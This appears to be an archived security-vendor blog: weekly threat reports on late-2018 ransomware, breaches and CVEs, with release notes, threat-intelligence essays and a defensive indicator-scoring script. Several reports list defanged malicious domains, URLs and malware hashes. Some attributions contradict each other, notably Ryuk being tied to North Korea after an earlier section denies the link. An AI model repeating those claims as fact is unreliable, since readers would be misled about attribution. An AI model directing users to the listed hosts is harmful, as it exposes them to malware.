The ransomware was created by a threat actor, which CrowdStrike calls Grim Spider, who allegedly bought a version of Hermes ransomware from an underground forum and modified it into Ryuk ransomware. The confusion possibly stems from reports that North Korean state-sponsored actors infected the Far Eastern International Bank (FEIB) in Taiwan with Hermes ransomware in October 2017.

Researchers believe that North Korean attackers purchased the same Hermes ransomware kit, similar to Grim Spider, and deployed it on the bank’s network as a distraction in an attempt to cover their tracks. Researchers believe there is no connection between North Korean state-sponsored attackers and the Ryuk ransomware strain. Researchers note that multiple Ryuk ransomware victims were infected with TrickBot before Ryuk was deployed on their systems and speculate that attackers selected machines infected with TrickBot to deploy Ryuk.

Since Ryuk’s appearance in August, threat actors have earned 705.80 Bitcoin across 52 transactions, for a current value of $3,701,893.98. The following indicators of compromise were released with these findings.


Insurance Group declines payout for Russian attributed ransomware

Bloomberg shared their findings with ZDNet after reporting a lawsuit against Zurich Insurance Group by Mondelez, which seeks $100M in damages after an insurance claim for the NotPetya attack was not paid out. NotPetya is a type of ransomware similar to Petya. Researchers noted that the actors spread it using the much-discussed and patchable EternalBlue and EternalRomance exploits of yesteryear. (Yes, these attack vectors are still being exploited today.)

Once executed, the malware will reboot the system and overwrite the master boot record (MBR) with a custom loader and a ransom note which demands $300 in Bitcoin. Researchers note that NotPetya impacted business worldwide including TNT, Ukrainian banks, energy companies, airports, and shipping giant Maersk. Users and organizations should enforce strong security awareness, recognize phishing attacks, exercise caution when clicking on malicious links, and deploy two-factor authentication to mitigate cyber attacks. No indicators of compromise were released with this report.

Zurich chose not to cough up the money, citing that NotPetya was a “hostile or warlike action in time of peace or war,” which voided the claim. The security industry will be following this case closely, as it will set precedent on this topic. With Ryuk’s move to Russia, will Tribune’s cyber insurance policy cover fallout from a Russian cyber cold war?

Which brings up a question for you: What would your cybersecurity insurer say if your organization suffers a ransomware attack? Now is a good time to open the discussion before an incident might occur.

After several cups of perch-olated coffee and a blood sacrifice, the Perch SOC successfully reviewed the activity and IOCs listed for each threat and found zero Perch customers subjected or targeted by these active threats for the last 30 days.

Release Notes

January 11, 2019

  • Allow MSSPs to manage themselves with ConnectWise
  • Upgrade Perchybana to use ELK 6.x and migrate data

  • Make user details visible to support admins
  • Allow support admin users to troubleshoot 2FA
  • Allow ConnectWise integration form fields to be null
  • Migration issues for ELK 6.x
  • Rotate Google Maps API key for sensor setup
  • Increase time allotted for intel to impact sensor health
  • Create missing team relationships on sign up

Threat Report Wednesday January 9th 2019

on January 9, 2019

It’s clear that ransomware is ruling the new year, so today we’re covering activity from three ransomware campaigns. We’ll also be checking out a recent 0day discovered in the wild that has been bringing home the cache for some lucky attacker. But first, let’s start with a high-profile data breach.

Humana healthcare provider discloses data breach

According to a breach notification filing with the California Attorney General’s Office, healthcare management provider, Humana, disclosed that attackers compromised an associate, Bankers Life, and stated that the incident impacted a limited number of Humana customers. The statement disclosed that between May 30 and September 13, 2018, an unauthorized actor used employee system credentials to gain access to certain secure Bankers Life websites, potentially granting them access to a limited number of customers’ information.

Potentially exposed information included name, address, date of birth, last four digits of their social security number, and health insurance policy coverage details. Bankers Life learned of the incident on August 7 and Humana was notified of the malicious activity on October 25, 2018. The number of customers impacted was not disclosed. Humana states that the offenders did not access full social security numbers, banking or credit card information, or personal health or medical records. But the data that was stolen is enough to social-engineer someone into identity theft. In public statements the company, shamelessly and ironically, recommends a Bankers Life identity protection service to the victims for identity theft protection. They couldn’t keep customer data secure before, so what makes anyone think they deserve the right to more of your data? If they feel strongly about the suggested consumer response to the damage they have inflicted, they should be giving the service away to all of those affected.

Recent side channel 0day steals data from Operating System’s cache

Security researchers from Graz University of Technology, Boston University, NetApp, CrowdStrike, and Intel shared their findings with Bleeping Computer about a new side channel attack that targets an operating system’s page cache. The side channel attack is a race condition that a malicious process exploits to carry out a successful local attack.

Researchers disclosed the flaw to the affected vendors after they detected an exploitation attempt against Windows and Linux machines. Researchers noticed that the actors had been executing the exploit through the page cache query interfaces: mincore (CVE-2019-5489) on Linux and QueryWorkingSetEx on Windows. CVE-2019-5489 is a race condition that allows an attacker to observe the page cache access patterns of other processes on the infected system.

Users and organizations should be ready to install security updates to limit their exposure to threats. No indicators of compromise were released with researchers’ findings, however, an in-depth technical analysis is available for review.

Vidar and GandCrab: Stealer and ransomware combo observed in the wild

Malwarebytes security researchers recently discovered a prolific malvertising campaign that targets high-traffic torrent and streaming sites and redirects users towards two malicious payloads. The first is Vidar, a malware that targets vast amounts of victims’ information. The second is GandCrab, one of the most active families of file-encrypting malware currently in operation. Once GandCrab executes, the actors deliver a ransom note demanding either Bitcoin or Dash in exchange for retrieving the files. Users and organizations must keep software and firmware up to date with timely patches to prevent such attacks. The following indicators of compromise were released with Malwarebytes’ findings.


- Kolobkoproms[.]ug
- ovz1[.]fl1nt1kk[.]10301[.]vps[.]myjino[.]ru


- abf3fdb17799f468e850d823f845647738b6674451383156473f1742ffbd61ec
- e99daf10e6cb98e93f82dbe344e6d6b483b9073e80b128c163034f68de63be33

New wave MongoLock ransomware immediately deletes files

Trend Micro reports sightings of a new wave of MongoLock ransomware attacks, whereby files are immediately deleted instead of encrypted and further scans are automatically performed to delete additional files.

Researchers state that MongoLock was first sighted in the wild in December 2018. The ransomware message claims that the files are saved in the cybercriminals’ servers and demands a payment of 0.1 Bitcoin be paid within 24 hours.

Trend Micro states that the highest number of infections are in South Korea, Great Britain, the United States, Argentina, Canada, Germany, Taiwan, and Hong Kong. The campaign was sighted targeting databases with weak security settings, and the ransomware was hosted on PythonAnywhere, a Python-based online integrated development environment (IDE) and web hosting service. Researchers state that any host using hxxp://{user-defined} may be vulnerable to abuse. The following indicators of compromise were released with researchers’ findings.

IP Address
- hxxp://update[.]pythonanywhere[.]com/d
- hxxps://s[.]rapid7[.]xyz 

Loki variant new campaign: Uses “.ace” attachments via fake DHL Express quotation

Security researchers shared their findings with My Online Security after observing a new campaign in which a Loki variant targets victims via malicious documents to gather information. The malicious “.ace” attachment contains a password-stealing component that encrypts the victim’s files. Attachments with the following file extensions are malicious: js, exe, com, pif, scr, hta, vbs, wsf, jse, and jar. Researchers noticed that the actors had been delivering the malware through a malicious “.ace” file.

Once executed, it encrypts the victim’s files and the actors demand a ransom to recover them. Users and organizations should always be cautious with email content that pretends to come from a legitimate company and asks for personal information. The following indicators of compromise were released with the researchers’ findings.


- 6e98fd04a2b9f62eb8682152fc93e60c
- 6a904e3d3449f6254364d2170719247c1356fd7c 

Is Cybersecurity the Death of Digital Marketing?

on January 8, 2019

Marketing has evolved tremendously since my days in college as an eager student. I listened intently as my professor explained things like the 4 P’s of marketing and mutually beneficial relationships, paired with acronyms like, WIFM and MRR. While these were relevant at the time, and still are in many aspects, things have changed… to say the least.

Facebook is the new Yellow Pages, and SEO is the new TV commercial. In other words, it’s technology or bust, baby. Marketing teams are now comprised of developers, engineers, and just all-around techy people. Job descriptions for “digital marketing manager” can barely fit into a LinkedIn post. Many organizations are having to create jobs to cover their basic marketing needs, but with a more technical twist. And while this candidate seems ideal to the CMO, often these people (and these positions) don’t even exist (yet).

It’s true that technology is fueling marketing agendas, strengthening communication, and creating a space where literally anything is possible. But, to this reward comes great risk, and as a starry-eyed marketing team, awareness means so much more these days when it comes to cyber breaches within a company.

Awareness leads to ROI… but also hackers

While the role of marketing has evolved, its goal has remained consistent: awareness.

So, what happens when your goal as a department is awareness, but this said awareness could potentially cause more harm than good? Enter the complicated relationship status of marketing and cybersecurity.

With an ever-growing need for and move toward technology, marketers are at risk from the moment they craft that clever Tweet to when they hit send on their drip campaign: an exposed, vulnerable, easy target just waiting to be attacked. Sharing passwords without a secure line like LastPass can quickly turn into a hacker’s dream come true. Submitting payments for upcoming tradeshows or sharing documents via Slack can all go from collaboration to corroboration… against your company.

“The marketing technology map today is dizzying, and the increase in technology solutions can expose companies to a great deal of risk. With the pressure on marketing teams to do more with less and to demonstrate program ROI, marketers are eager for new technology solutions to optimize their campaigns and to work more efficiently and effectively. But these solutions are not without risk.” (

That begs the question: In 2019, is it possible to be a great digital marketer without all the risk? It is. You just have to be one smart cookie.

Tracking cookies are crumbling

Cookies, while a difficult New Year’s resolution to quit, were until recently an easy trail for any marketing team to follow. Now, with increased security risks and international laws, people have the right to choose whether they are tracked, under the Cookie Law. While this is an incredibly smart safety feature, it puts a huge roadblock in the way of digital marketing.

Not that cookies are the only way to run a successful digital marketing plan, but it does pose the question of, “where do we go from here?” The answer? Build your team so that IT and marketing can exist together in a safe, secure environment.

Build your flock

We as marketers must prove ROI over and over again; with our team, our technology, and our tactics. But how can this happen when some typical, often successful marketing tactics are now considered risky?

“It is critical that the marketing organization understands the importance of working with IT on security protocols when introducing new technology to the organization for the security of the overall business.”

Little things like reminding people not to open a suspicious email or implementing mandatory use of security programs are the fastest way to avoid a future issue. Something as simple as saying, “Hey, if you see an email from me asking for money, I can promise you it is not really from me. I will never send that in an email.” (Something my CEO recently said on a work call, but it made sense. Lots of sense.)

Can marketing be successful and still be safe? Can it “swipe right” on the proverbial seesaw of safety and satisfaction, or is it a friends-without-benefits sort of thing? A relationship that keeps volleying over a net of exposure barely able to skim the top without being pummeled to the ground can’t survive, can it? The answer is Yes. Very strongly, Yes.

We just might not be compatible… ¯\_(ツ)_/¯

Where do we go from here? Such is life, you win some you lose some. But that doesn’t necessarily mean it’s over between cybersecurity and marketing. It simply means, like all things, it must evolve. Work with your IT team on ways to improve security, especially when introducing new technology or bringing on new employees. Alongside budgets, social media calendars, and tradeshow requests, marketers need to now include a security plan. Teams need to be trained, protocols put into place (two-factor anyone?), and real conversations need to be had on how to properly work in a technical space.

It’s easy to fall back on old habits (and we all know those die hard), but simple things like keeping passwords in an Excel doc inside your Google Drive need to never happen again. Create a protocol for a security breach, hand employees company laptops with safety programs already installed, and train your less techy team on things that should be shared versus things that you need to just not. Digital marketing as a whole is going to continue to change, and these hackers, aka people looking for vulnerability, are going to as well.

Threat Report Wednesday January 2nd 2019

on January 2, 2019

Happy new year! We’re going to close out 2018 with Ryuk ransomware hitting the press and ring in 2019 with some new year hacktivity by two threat actors.

Tribune Publishing held hostage by Ryuk

On December 29, 2018, it was widely reported that Tribune Publishing was unable to publish Saturday editions of major U.S. newspapers, including the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, and the Baltimore Sun. The disruption also affected the distribution of the Wall Street Journal and the New York Times on the West Coast. Tribune’s disruption was caused by a ransomware infection, and it affected every Tribune market across the United States. Tribune Publishing has recently been divesting from newspapers in favor of online content generated by robots, which likely means they weren’t paying attention to printing facilities the way they should have. Obviously, we need more legislation and compliance standards for securing news media. Or, we’ll end up with a resurgence of incidents similar to the Max Headroom incident.

The LA Times recently confirmed that the printing house was targeted by threat actors in North Korea. Ryuk ransomware is a targeted strain that is attributed to Lazarus Group. The implication of North Korea does not confirm that the incident was intended to disrupt the activity of the U.S. press, but indicates that some aspect of Tribune Publishing, or their connected publications, were targeted for financial gain by the ransomware strain.

Ryuk ransomware has appeared in campaigns targeting large organizations both in the United States and around the globe. Ryuk typically targets enterprises that are capable of paying a lot of money in order to restore operations, suggesting that operations using this ransomware are primarily financially motivated. It first emerged in August 2018 and in the space of just days infected several organizations across the U.S., encrypting PCs, storage and data centers of victims, as well as demanding 15-50 Bitcoin in ransom. However, the attacks are highly targeted, with perpetrators conducting tailored campaigns involving extensive network mapping, network compromise, and credential stealing in order to reach the end goal of installing Ryuk and encrypting systems.

Even though Ryuk has been used by the financially motivated, I can’t help but wonder about ulterior motives. Maybe this is a twofer. It seems to me, America is already questioning where it can get factual news from and shutting down trustworthy lines of information which is dangerous. Digital and print news was disrupted for millions of people. There are groups that don’t want information to be open, accessible, or intelligible. Journalists have been targeted this past year and now the threats are moving upstream to the publishers and printers.

TDO threatens release of 9/11 insurance docs

In what very well could have been the new year somewhere on earth, “Thedarkoverlord” (TDO) claimed to have stolen approximately 18K documents from Hiscox Syndicates, National Life Group, Advantage Life Investment Bank, Lloyds of London, and Silverstein Properties and threatened to share documents related to the 9/11 attacks publicly.

TDO is known to have targeted the production studio for Netflix, medical centers, and private businesses across the United States. TDO provided a link for a 10GB archive of allegedly stolen files in their extortion note and threatened to release relevant decryption keys to unlock different sets of files in exchange for an undisclosed ransom fee in Bitcoin from the victims. It is unclear at present exactly which files the actor stole, but researchers believe it is certainly an attempt to capitalize on conspiracy theories surrounding the 9/11 attacks. My tinfoil hat is buzzing with excitement.

Motherboard reports that Hiscox Group confirmed hackers had breached and likely stolen files related to litigation around the 9/11 attacks from a U.S. law firm that advised the company: “The law firm’s systems are not connected to Hiscox’s IT infrastructure and Hiscox’s own systems were unaffected by this incident. One of the cases the law firm handled for Hiscox and other insurers related to litigation arising from the events of 9/11, and we believe that information relating to this was stolen during that breach,” the Hiscox spokesperson wrote in an email.

Don’t sue me for saying so, but lawyers have the worst security. If I was going to take down the largest insurer in the world, I would definitely work my way through a low security backdoor, like their lawyer. We should be treating law firms as vendors with remote access in terms of vendor risk management.

New World Hackers aim at Gulf Coast govs

New World Hackers have been going on a new year spree dumping data from, and a number of smaller government organizations around the region. They don’t exclusively target government organizations, but the lowest bidding government contractor isn’t always good at application security. Plus, opportunity makes a great motive.

The group also disclosed a breach of Lenovo through their Twitter accounts, but the data dumps were taken down from Ghostbin before I could confirm them. Roughly 127K customer records and 1M user records were reportedly exposed in the breach.

Previously, the group took credit for database breaches at Atlanta International Airport and Colorado Government organizations.

Getting the Most Value from Threat Intelligence

on January 2, 2019

In a previous post, we described threat intelligence as “organized and analyzed information about potential threats to your organization.” It is easy to say having that information is important, but the value of threat intelligence is not decided when it is created. The value is determined when threat intelligence is put into action. To illustrate this point, let’s look at an app called Zillow. Zillow provides users with real estate data about homes they want to buy, sell, or rent. This is useful for someone who is looking to perform those actions with real estate, but for most users, the value of the data is lost because they never put that knowledge into practice. The same thing happens with threat intelligence when it is consumed by an organization. Value is determined once the intelligence is put to some action.

How do you determine value?

There are many ways threat intelligence can be utilized to create value. One way is to create a security awareness training program based on the known threats against a vertical. An organization can take that threat intel, understand what the attacks are, where they are coming from, and how they will affect the organization. From this information, one can then create a training program for the employees of the organization to change their behaviors in order to prevent them from being susceptible to the attack vectors. People can be a great defense when it comes to securing an environment, and it is valuable to keep them aware and trained on best practices. Threat intelligence can help shape that curriculum.

Another way threat intelligence can be used to create value for an organization is by reducing operational risk. Operational risk is any event that disrupts business processes, and a successful cyberattack would definitely disrupt business. Focusing on the threat intelligence that is most relevant to the type of business one does is key in getting the most value. For example, if a power company is threatened by nation-state actors, they are not going to be as concerned by some script kiddies looking for low-hanging fruit out on the Internet. They will be more interested and focused on the advanced threats coming from specific areas in the world and mitigating those threats. Understanding how those threats come to fruition will help them reduce operational risk within a given timeframe, providing them tremendous value.

In addition to reducing operational risk, threat intelligence can also help a business focus on their priorities when it comes to security. Many businesses are not sure about how much money, time, and resources they will need to invest into a security program. There are a lot of tools available to provide defensive and preventative measures, but many take time to set up, personnel to manage them, and are costly (even before the other associated costs are accounted for). Understanding what attacks are relevant to an industry or business, and the severity of those attacks, can help one decide where security should be focused as well as what policies need to be put in place in order to maintain business efficiency and profitability.

Discovering value: The Perch way

Threat intelligence by itself does not carry much value. Value is discovered by how threat intelligence is applied in an organization. For us at Perch, we apply threat intelligence at the network level. By correlating network traffic going in and out of an organization to threat intelligence from multiple threat intel communities, we not only provide a comprehensive look at what is going on in an environment, we also provide specific context to any alerts that are created from our sensors. We have completely automated the process of applying threat intelligence. We have a group of security analysts at our Security Operations Center applying human intelligence to those alerts, creating a low-footprint, high value return to any organization using our service.

If you have any questions about Perch and what we do, please request a demo. We will be more than happy to help you learn where you can get the most value out of applying threat intelligence to your organization.

Release Notes

December 28, 2018

  • Add Django command for printing IP counts
  • Better error messages for ConnectWise setup
  • Allow MSSPs to change preferences of users they manage

  • Fix null bugs on the UI
  • Fix styling of countdown timer on alert rows
  • Remove deleted MSP users from all managed teams

Threat Report Thursday December 27th 2018

on December 27, 2018

We hope you had a happy holiday, but it is time to get back to the grind. Holiday cheer wasn’t the only thing spreading this season. Tenable gave the gift of vulnerability disclosure to Cisco, the Department of Justice handed out indictments for Chinese hackers like candy, and 500K students are eagerly waiting to find out what they will get from the San Diego School District.

Cisco ASA privilege escalation disclosed and patched

Cisco Adaptive Security Appliance (ASA) Software is reportedly affected by privilege escalation vulnerability CVE-2018-15465. Researchers at Tenable discovered that a remotely authenticated, unprivileged user can change or download the running configuration. And, that’s bad.

The vulnerability could be exploited by an attacker sending a crafted HTTP request as an unprivileged user, because the Cisco ASA Web management interface improperly validates user privileges. The attacker can retrieve files (including the running configuration) or upload and replace the software image. Cisco released an update to patch the vulnerability.

CVE-2018-15465 impacts ASA software running on any Cisco product that has Web management access enabled, with command authorization disabled. Users are advised to update to the latest patch according to the Fixed Releases table located in the Cisco Security Advisory.

Stone Panda indicted and linked to Chinese state-sponsored economic espionage

The United States Department of Justice indicted two Chinese nationals, Zhu Hua and Zhang Shilong, who participated in a 12-year campaign that targeted U.S. managed security providers. This duo is believed to be part of Stone Panda aka Red Apollo (APT10). The activity breached at least 45 companies through their managed service providers (MSP) in 12 countries. The campaign was performed by a company fronting for the Chinese Ministry of State Security (MSS). The indictments show MSS’ continued use of front companies for international economic/technology espionage operations. Washington’s indictments send a clear message to China: intrusions to improve economic competitiveness are unacceptable.

The modus operandi for the campaign was straightforward: leverage stolen credentials to gain access to an MSP network and use the MSP’s access to steal their clients’ intellectual property. A little birdie told us these IPs were used in APT10 operations:

500K records exposed in San Diego school district breach

Stolen credentials aren’t just being reused against MSPs and their clients. Hackers are credential phishing, reusing previously breached passwords, and deploying password stealing malware to gain access to your networks and the networks you trust. The education sector has recently been learning that lesson.

San Diego School District recently disclosed a data breach for 500K students. We regularly hear about universities being targeted, but public-school districts are a target too. Many of the social security numbers breached won’t be valuable until the students can get approved for credit; but children are victims of identity theft as well. If you were born today, just how long would it take for your SSN to be breached? I’m betting that a large percentage of children born today will have PII breached before they can talk.

Attackers phished San Diego School District faculty to gain access to just about every type of sensitive information they had from the last 10 years including:

  • Student enrollment information like schedule, discipline incident information, health information, attendance records, transfer information, legal notices on file, and attendance data
  • Student and staff State Student ID Number
  • Student and staff parent, guardian, and emergency contact personal identifying information (including first and last name, phone numbers, address, email address, employer information)
  • Staff benefits information
  • Staff payroll and compensation information (including viewable paychecks and pay advices, deduction information, tax information, direct deposit financial institution name, routing number and account number, salary and leave information)

Earlier this month Cape Cod Community College (CCCC) was cyber-swindled for 800K dollars. The threat actor was using phishing emails with attached viruses to land a first stage infection. The second stage infection was password stealing malware. The Boston Globe reported that CCCC President, John Cox, emailed staff and students stating, “the school believes the same hackers tried to infiltrate other colleges in the area” but said “he did not know which ones.” This statement perfectly highlights that organizations need to join relevant information sharing communities.

That’s all for now. So long, and thanks for all the phish.

Threat Report Wednesday December 19th 2018

on December 19, 2018

This week we’re covering critical vulnerabilities discovered in Huawei routers, Jenkins continuous build automation servers, and SQLite databases. Additionally, we’re going to review a threat actor that is taking aim at critical U.S. infrastructure.

Security community calls Huawei’s bluff on security claims

Huawei’s integrity has been called into question recently. Many countries are taking U.S. leadership and canceling Huawei orders. Canada has arrested the Huawei CFO for extradition to the United States. During all this, Huawei has asked the U.S. to put up or shut up. And, the security community has responded with proof. A staggering vulnerability report for Huawei routers (CVE-2018-7900) has been released and Huawei doesn’t just make exploitation possible, they make it easy.

There is no spray and pray necessary for attackers. You can find all vulnerable routers with a Shodan/ZoomEye query. There is no need to fail a login: the login page indicates if the default password has been changed. This makes detecting abusive activity difficult because attackers don’t make much noise, and it’s possible to generate a list of 100 percent exploitable targets based on a dork query.

Jenkins makes guests feel at home with anonymous to admin access

CyberArk’s security researchers discovered two vulnerabilities exposing Jenkins servers. Jenkins is a Web application for continuous integration built in Java that allows development teams to run automated tests and commands on code repositories based on test results. CyberArk disclosed the flaw to Jenkins after they detected an exploitation attempt against Jenkins servers. The actors used two different vulnerabilities to launch attacks. The first is CVE-2018-1999001, a flaw that allows an attacker to remove files from the Jenkins master file system. The second is CVE-2018-1999043, which allows an attacker to create ephemeral user records in the server’s memory. Both of these vulnerabilities have been addressed and fixed. ZDNet was able to discover over 2,000 vulnerable Jenkins servers within a few minutes. Researchers believe that the total number of vulnerable servers might even be over 10,000. Users and organizations must keep software and firmware up to date with timely patch updates to mitigate attacks. File integrity monitoring on a Jenkins server could detect the security configuration file being moved.

Magellan vulnerability discovered in SQLite

Last week, security researchers from Tencent Blade Team disclosed a remote code execution vulnerability in SQLite dubbed Magellan. SQLite is a widely used and well-known database utilized in all modern mainstream operating systems and software, meaning that this vulnerability holds a wide range of influence.

Researchers state that Google has fixed this vulnerability; however, Google is not disclosing the details of Magellan at this time as they are pushing vendors to fix it as soon as possible. Devices or software that use SQLite or Chromium are affected, and the dangers of exploitation include remote code execution, leaking program memory, or causing program crashes.

The vulnerability can be triggered remotely, for example, when a target visits a particular Web page in a browser, or in any scenario that can execute SQL statements. Researchers did not observe any abuse of Magellan in the wild at the time of publishing. There is currently no CVE for this vulnerability. We will likely see this weaponized into a new or existing exploit kit or as part of a scanner’s arsenal of exploits over the next week or two. So, update SQLite or your applications that use SQLite, like Chromium based browsers (Chrome, Vivaldi, Opera, and Brave). Products using SQLite are advised to update to 3.26.0, and Chromium users are advised to update to the official stable version 71.0.3578.80.

Sharpshooter takes aim at critical infrastructure

McAfee security researchers discovered an advanced threat actor they call “Sharpshooter” targeting defense organizations and critical infrastructure sectors using source code from the infamous Lazarus group. McAfee disclosed the campaign on December 12, 2018, after they detected exploitation attempts against organizations in the nuclear and defense sectors. The threat actor is executing the first stage exploit through a malicious Office document that contains a weaponized macro. The macro downloads the second stage backdoor, dubbed Rising Sun, which performs reconnaissance on the victim’s network. Once executed, the victim’s data will be sent to a C2 server for monitoring by the actors to launch the attacks. Researchers have detected 87 victims from different industry sectors in this campaign. First stage infections that start with an Office document are typically spread through malspam.

Indicators of Compromise: The Good, the Bad, and the Ugly of Threat Intelligence

on December 18, 2018

We’re having a lot of great conversations around threat intelligence lately, so we’ve decided to address threat intelligence as part of a series with this post being part one.

What is threat intelligence?

Threat intelligence is defined as organized and analyzed information about potential threats to your organization.

Threat intelligence is best when qualified and shared. The best security value comes from sharing information regarding the sighting of IOCs. The reason why threat actors have an advantage is their willingness to share tools and techniques. 

Lately, defenders have started to ask why they can’t do the same thing. Historically, we have been unwilling to share information. Information can be shared to level the playing field. This is the trend with Information Sharing and Analysis Centers and Organizations (ISAC/ISAO). This approach enhances the security posture of the organizations that participate.

Perch is here to help you benefit from intelligence provided by ISAC/ISAOs in new ways, by enabling you to contribute to these communities with very little effort on your part. Let’s dive into how we use this concept and how you can participate with Perch.

Intel driven analysis: The Perch way

In threat detection, a system can only be as good as the intelligence it works with. In order to build the best threat detection capabilities, it’s essential to work with as much threat intelligence as possible. But volume alone can drown out the signal. Low-fidelity intelligence can be noisy and generate a lot of false positives (indicators that need to be tuned out). Poor intelligence hurts threat sharing communities more than it helps. It lowers the reputation of the intel community by diluting the ratio of true to false positive alerts produced. This causes community members to question the value of the community.

Where does threat intelligence come from?

[Figure: Threat intel delivered by the Flockchain]

Threat intelligence comes from many sources. Some are created by threat intelligence analysts, intelligence community members, or from open source intelligence. These Indicators of Compromise (IOC) are ingested into our system as a signature that potentially indicates compromise. When Perch sees activity that matches these signatures we flag, analyze, and notify you if it is a threat. 

Perch consumes intelligence from ISACs and ISAOs, subscription-based feeds (Cisco Talos, Emerging Threats, and Intel 471), free feeds (Department of Homeland Security), and other open and closed community-based feeds. 

Good intelligence vs. bad intelligence


We like when you share, so we’ll share too. We are not here to pass judgement on the intel you share. When we refer to good intelligence, we mean indicators that have a high likelihood of indicating compromise. At Perch, we enable intel sharing communities to refine the intelligence they share. We do this by providing peer sightings, true/false positive ratio, and analyst notes. Intelligence communities then understand how their intelligence is performing by qualifying it against our customer data and sharing it with the community.

Bad intelligence has a low probability of indicating a compromise. An example is an IP-based indicator. This is true for a number of reasons. An IP does not always represent the true source of a threat (e.g. content delivery network (CDN) or shared hosting provider that hosts multiple sites on one IP address). Virtual hosting providers can host up to 10K domains on a single IP address. Without a related domain for that IP it’s impossible to tell if the observed behavior is consistent with the threat. Without having a second indicator to pair with it, an IP indicator is not the best indicator. The best indicators of compromise have multiple data points like an IP, plus a domain.
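The scoring argument above, worked through on a few constructed sensor records as an added example (this is not Perch’s own code): an IP hit alone is queued as low confidence because of shared hosting and CDNs, a matching domain on a different IP as medium, and an IP plus domain agreement as high. The log format, field names and indicator list are assumptions made for the example.

```python
import re
from typing import List, Optional

# Constructed indicators; these are documentation-range values, not real threat intel.
INDICATORS = [
    {"id": "ioc-1", "ip": "203.0.113.45", "domain": "bad.example"},  # IP plus domain
    {"id": "ioc-2", "ip": "198.51.100.7", "domain": None},           # IP-only indicator
]

# Constructed sensor records (assumed format): timestamp, source, destination, TLS SNI.
LOG_LINES = [
    "2018-12-18T10:00:01 src=10.0.0.5 dst=203.0.113.45 sni=bad.example",
    "2018-12-18T10:00:02 src=10.0.0.6 dst=203.0.113.45 sni=cdn-customer.example",
    "2018-12-18T10:00:03 src=10.0.0.7 dst=198.51.100.7 sni=-",
    "2018-12-18T10:00:04 src=10.0.0.8 dst=192.0.2.9 sni=benign.example",
    "2018-12-18T10:00:05 src=10.0.0.9 dst=192.0.2.77 sni=bad.example",
    "malformed line from a truncated capture",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) sni=(?P<sni>\S+)$")


def parse_line(line: str) -> Optional[dict]:
    """Parse one record; return None for lines that do not fit the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    if rec["sni"] == "-":  # no hostname observed (plain TCP, or SNI absent)
        rec["sni"] = None
    return rec


def score_match(record: dict, indicator: dict) -> Optional[dict]:
    """Compare a record to an indicator and rate how many data points agree."""
    ip_hit = record["dst"] == indicator["ip"]
    dom_hit = indicator["domain"] is not None and record["sni"] == indicator["domain"]
    if not ip_hit and not dom_hit:
        return None
    if ip_hit and dom_hit:
        confidence = "high"    # two independent data points agree
    elif dom_hit:
        confidence = "medium"  # the domain moved to new hosting; still worth a look
    else:
        # IP hit only: either the indicator has no domain to corroborate it, or the
        # observed hostname disagrees, which is what shared hosting and CDNs look like.
        confidence = "low"
    return {"indicator": indicator["id"], "confidence": confidence,
            "ip_hit": ip_hit, "domain_hit": dom_hit}


def analyze(lines: List[str], indicators: List[dict]) -> List[dict]:
    """Run every parseable record against every indicator and collect alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for ind in indicators:
            hit = score_match(rec, ind)
            if hit:
                alerts.append({"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
                               "sni": rec["sni"], **hit})
    return alerts


def triage_queue(alerts: List[dict]) -> List[dict]:
    """Order alerts so an analyst sees multi-point matches before IP-only noise."""
    rank = {"high": 0, "medium": 1, "low": 2}
    return sorted(alerts, key=lambda a: (rank[a["confidence"]], a["ts"]))


if __name__ == "__main__":
    for a in triage_queue(analyze(LOG_LINES, INDICATORS)):
        print(f'{a["confidence"]:6} {a["ts"]} {a["src"]} -> {a["dst"]} sni={a["sni"]} ({a["indicator"]})')
```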

Curious to find out more?

Keep an eye out for the rest of this series, coming soon.  

And for more information on how we can help bolster your organization’s security posture through threat intelligence, please reach out to us to schedule a demo.

Threat Report Friday December 14th 2018

on December 14, 2018

There has been a lot of interesting development over the last week, so let’s roll through it. In response to world events, nation-states are being implicated in hacking each other. Microsoft and Adobe released critical patches to cover code execution vulnerabilities. Malware authors are increasingly targeting Mac OS X. And, an APT takes aim at academics.

After poisoning ex-spies, Russian government hit with Poison Needles

Adobe has now released a patch for CVE-2018-15982 that was recently used in compromising a Russian medical facility. 360 Core Security researchers disclosed findings related to a security incident from late November 2018 involving the FSBI Polyclinic No.2.

The attacker used spear-phishing with an attached doc that appeared as an in-depth employee questionnaire to exploit a recent Flash 0-day (CVE-2018-15982) and deploy a customized trojan with the ability to detect when it has been caught and self-destruct. The primary function of this trojan seems to be maintaining persistence, avoiding detection, and exfiltrating data to an IP in Romania. Researchers named the attack “Operation Poison Needles” as the target was a medical institution; but I think the name might be fitting for other reasons. The attacker launched the trojan from a compressed package. The PE payload backup.exe masqueraded as an NVIDIA control panel application with detailed file descriptions and version numbers.

Some commentators believe that this was in response to the Kerch Strait incident which occurred on November 25, 2018. I believe this is a response to Russian activity, but not the Kerch Strait incident. What relevance does an attack on a Russian health organization have in response to military aggression? I believe this may be a response related to the UK poisoning plot targeting former Russian agent Sergei Skripal. This customized trojan and spear-phishing seem to be an information grab. The FSBI Polyclinic 2 could be the facility that created or stored the Novichok nerve agent used in the poisoning plot. Poison Needles may have been an operation to find evidence related to that attack.

Samples of the customized Trojan were first uploaded to VirusTotal on November 29. The Kerch Strait incident occurred on November 25. If this were a response to any incident, then it was likely a failure. If I were a nation-state hack team, I’d like to get more use out of custom malware and an Adobe 0-day than four days. Although, four days is plenty to completely compromise a network. So, maybe they got what they were looking for. Either way, I feel the response is not relevant to the Kerch Strait incident and so it must be related to something else… or maybe nothing at all. Perhaps the timing was meant to provide false attribution to Ukraine.


- 2abb76d71fb1b43173589f56e461011b  
- 92b1c50c3ddf8289e85cbb7f8eead077
- 1cbc626abbe10a4fae6abf0f405c35e2

Windows patch Tuesday - December

Adobe isn’t the only software company releasing some serious patches. This week we’ve got another critical Patch Tuesday from Microsoft. The patch includes a fix for the Win32k Privilege Escalation Vulnerability (CVE-2018-8611), which allows attackers to exploit the Windows kernel to run arbitrary code to install programs, modify data, or create accounts. The fix also covers a heap overflow remote code execution (RCE) that’s being actively exploited in Windows DNS Server when it fails to properly handle a specially crafted request. Attackers can exploit this vulnerability to run arbitrary code in the context of the Local System account.

